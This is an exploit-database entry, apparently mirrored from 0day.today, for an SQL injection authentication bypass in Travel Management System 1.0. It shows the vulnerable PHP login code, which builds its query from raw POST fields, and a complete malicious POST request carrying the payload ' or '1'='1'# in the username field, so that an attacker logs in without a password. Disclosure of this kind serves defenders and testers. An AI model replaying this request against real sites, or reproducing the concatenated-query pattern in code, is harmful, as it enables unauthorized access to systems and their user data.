Lucene search
K

Travel Management System 1.0 SQL Injection Vulnerability

🗓️ 11 Aug 2020 00:00:00Reported by Bobby CookeType 
zdt
 zdt
🔗 0day.today👁 247 Views

Travel Management System 1.0 SQL Injection Vulnerabilit

Code
# Exploit Title: Travel Management System v1.0 - SQLi Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) and Bobby Cooke (boku)
# Vendor Homepage: https://www.projectsworld.in
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/travel.zip
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4

# Vulnerable Source Code

if(isset($_POST["sbmt"]))
{
  $cn=makeconnection();
  $s="select * from users where Username='" . $_POST["t1"] . "' and Pwd='" . $_POST["t2"] ."'";
  
  $q=mysqli_query($cn,$s);
  $r=mysqli_num_rows($q);
$data=mysqli_fetch_array($q);
  mysqli_close($cn);
  if($r>0)
  {
    $_SESSION["Username"]= $_POST["t1"];
    $_SESSION["usertype"]=$data[2];
    $_SESSION['loginstatus']="yes";
    header("location:index.php");
  }
  else
  {
  echo "<script>alert('Invalid User Name or Password');</script>";
}
}
?>


# Malicious POST Request to /travel/admin/loginform.php HTTP/1.1
POST /travel/admin/loginform.php HTTP/1.1
Host: 192.168.222.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.135/travel/admin/loginform.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: PHPSESSID=n4g0c99qju1miu1dudci67bkjb
Upgrade-Insecure-Requests: 1


t1='+or+'1'%3d'1'%23&t2=hyd3sec&sbmt=LOGIN

#  0day.today [2020-08-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation